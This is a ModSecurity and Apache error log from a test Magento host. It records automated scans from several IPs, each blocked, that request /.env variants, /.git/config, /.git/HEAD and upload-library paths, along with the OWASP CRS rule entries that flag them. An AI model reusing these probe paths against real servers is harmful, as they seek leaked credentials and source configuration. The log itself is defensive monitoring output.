[Mon Jun 30 17:58:28.087535 2025] [:error] [pid 3576957] [client 93.123.109.81:44222] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGK0JK53xWNu5L8erDFYhwAAAAI"]
[Mon Jun 30 17:58:28.089527 2025] [:error] [pid 3576957] [client 93.123.109.81:44222] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGK0JK53xWNu5L8erDFYhwAAAAI"]
[Mon Jun 30 17:58:28.090185 2025] [:error] [pid 3576957] [client 93.123.109.81:44222] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGK0JK53xWNu5L8erDFYhwAAAAI"]
[Mon Jun 30 17:58:28.232467 2025] [:error] [pid 3623939] [client 93.123.109.81:44232] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGK0JBPS5zhhtJNAEiwWNgAAAAc"]
[Mon Jun 30 17:58:28.232712 2025] [:error] [pid 3623939] [client 93.123.109.81:44232] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGK0JBPS5zhhtJNAEiwWNgAAAAc"]
[Mon Jun 30 17:58:28.232894 2025] [:error] [pid 3623939] [client 93.123.109.81:44232] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGK0JBPS5zhhtJNAEiwWNgAAAAc"]
[Mon Jun 30 17:58:28.355583 2025] [:error] [pid 3624153] [client 93.123.109.81:59810] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGK0JKRXtP5XdZ4n84GozAAAAAs"]
[Mon Jun 30 17:58:28.355831 2025] [:error] [pid 3624153] [client 93.123.109.81:59810] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGK0JKRXtP5XdZ4n84GozAAAAAs"]
[Mon Jun 30 17:58:28.356001 2025] [:error] [pid 3624153] [client 93.123.109.81:59810] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGK0JKRXtP5XdZ4n84GozAAAAAs"]
[Mon Jun 30 17:58:28.464819 2025] [:error] [pid 3576955] [client 93.123.109.81:59812] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGK0JAEyYdp9KshNcX6OrgAAAAA"]
[Mon Jun 30 17:58:28.465064 2025] [:error] [pid 3576955] [client 93.123.109.81:59812] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGK0JAEyYdp9KshNcX6OrgAAAAA"]
[Mon Jun 30 17:58:28.465236 2025] [:error] [pid 3576955] [client 93.123.109.81:59812] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGK0JAEyYdp9KshNcX6OrgAAAAA"]
[Mon Jun 30 17:58:29.912208 2025] [authz_core:error] [pid 3624153] [client 93.123.109.81:59900] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Mon Jun 30 17:58:30.013731 2025] [:error] [pid 3576955] [client 93.123.109.81:59912] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGK0JgEyYdp9KshNcX6OrwAAAAA"]
[Mon Jun 30 17:58:30.013978 2025] [:error] [pid 3576955] [client 93.123.109.81:59912] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGK0JgEyYdp9KshNcX6OrwAAAAA"]
[Mon Jun 30 17:58:30.014162 2025] [:error] [pid 3576955] [client 93.123.109.81:59912] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGK0JgEyYdp9KshNcX6OrwAAAAA"]
[Thu Jul 03 01:28:37.427536 2025] [:error] [pid 901191] [client 195.178.110.161:35112] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGXApToNXz9loPDOF4xDIQAAAAM"]
[Thu Jul 03 01:28:37.429371 2025] [:error] [pid 901191] [client 195.178.110.161:35112] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGXApToNXz9loPDOF4xDIQAAAAM"]
[Thu Jul 03 01:28:37.429535 2025] [:error] [pid 901191] [client 195.178.110.161:35112] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGXApToNXz9loPDOF4xDIQAAAAM"]
[Sat Jul 05 06:56:30.578544 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGiwfviyXSla7hMA2d6bxwAAAAI"]
[Sat Jul 05 06:56:30.578860 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGiwfviyXSla7hMA2d6bxwAAAAI"]
[Sat Jul 05 06:56:30.579030 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGiwfviyXSla7hMA2d6bxwAAAAI"]
[Sat Jul 05 06:56:30.689027 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGiwfviyXSla7hMA2d6byAAAAAI"]
[Sat Jul 05 06:56:30.689285 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGiwfviyXSla7hMA2d6byAAAAAI"]
[Sat Jul 05 06:56:30.689471 2025] [:error] [pid 945016] [client 34.162.39.0:39358] [client 34.162.39.0] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGiwfviyXSla7hMA2d6byAAAAAI"]
[Mon Jul 07 12:16:54.142686 2025] [:error] [pid 989771] [client 165.232.186.186:47030] [client 165.232.186.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGueloE_hTZs1ZjQ2Qqy7gAAAAY"]
[Mon Jul 07 12:16:54.144416 2025] [:error] [pid 989771] [client 165.232.186.186:47030] [client 165.232.186.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGueloE_hTZs1ZjQ2Qqy7gAAAAY"]
[Mon Jul 07 12:16:54.144614 2025] [:error] [pid 989771] [client 165.232.186.186:47030] [client 165.232.186.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGueloE_hTZs1ZjQ2Qqy7gAAAAY"]
[Mon Jul 07 12:17:09.942956 2025] [authz_core:error] [pid 993811] [client 165.232.186.186:33896] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Mon Jul 07 12:17:23.088251 2025] [authz_core:error] [pid 989741] [client 165.232.186.186:51626] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Mon Jul 07 13:00:54.796955 2025] [:error] [pid 999319] [client 143.198.191.145:34224] [client 143.198.191.145] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGuo5uamZcUkC02lGIGu1QAAAA8"]
[Mon Jul 07 13:00:54.797312 2025] [:error] [pid 999319] [client 143.198.191.145:34224] [client 143.198.191.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGuo5uamZcUkC02lGIGu1QAAAA8"]
[Mon Jul 07 13:00:54.797519 2025] [:error] [pid 999319] [client 143.198.191.145:34224] [client 143.198.191.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGuo5uamZcUkC02lGIGu1QAAAA8"]
[Fri Jul 18 18:27:58.595573 2025] [:error] [pid 1271724] [client 54.242.13.27:52840] [client 54.242.13.27] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHp2DnFpR9I4XvjDSTKz8wAAAAs"]
[Fri Jul 18 18:27:58.598117 2025] [:error] [pid 1271724] [client 54.242.13.27:52840] [client 54.242.13.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHp2DnFpR9I4XvjDSTKz8wAAAAs"]
[Fri Jul 18 18:27:58.598411 2025] [:error] [pid 1271724] [client 54.242.13.27:52840] [client 54.242.13.27] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHp2DnFpR9I4XvjDSTKz8wAAAAs"]
[Sat Jul 19 08:13:56.712107 2025] [:error] [pid 1291454] [client 178.128.23.237:50624] [client 178.128.23.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHs3pODdkK46bMpKiKRDbwAAAAI"]
[Sat Jul 19 08:13:56.712350 2025] [:error] [pid 1291454] [client 178.128.23.237:50624] [client 178.128.23.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHs3pODdkK46bMpKiKRDbwAAAAI"]
[Sat Jul 19 08:13:56.712526 2025] [:error] [pid 1291454] [client 178.128.23.237:50624] [client 178.128.23.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHs3pODdkK46bMpKiKRDbwAAAAI"]
[Sat Jul 19 08:14:16.904704 2025] [authz_core:error] [pid 1291457] [client 178.128.23.237:40074] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Wed Jul 30 19:09:32.128334 2025] [:error] [pid 1572606] [client 192.241.141.38:53756] [client 192.241.141.38] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIpRzPVy0Jq6c4BDC1WHJAAAAAo"]
[Wed Jul 30 19:09:32.131185 2025] [:error] [pid 1572606] [client 192.241.141.38:53756] [client 192.241.141.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIpRzPVy0Jq6c4BDC1WHJAAAAAo"]
[Wed Jul 30 19:09:32.131376 2025] [:error] [pid 1572606] [client 192.241.141.38:53756] [client 192.241.141.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIpRzPVy0Jq6c4BDC1WHJAAAAAo"]
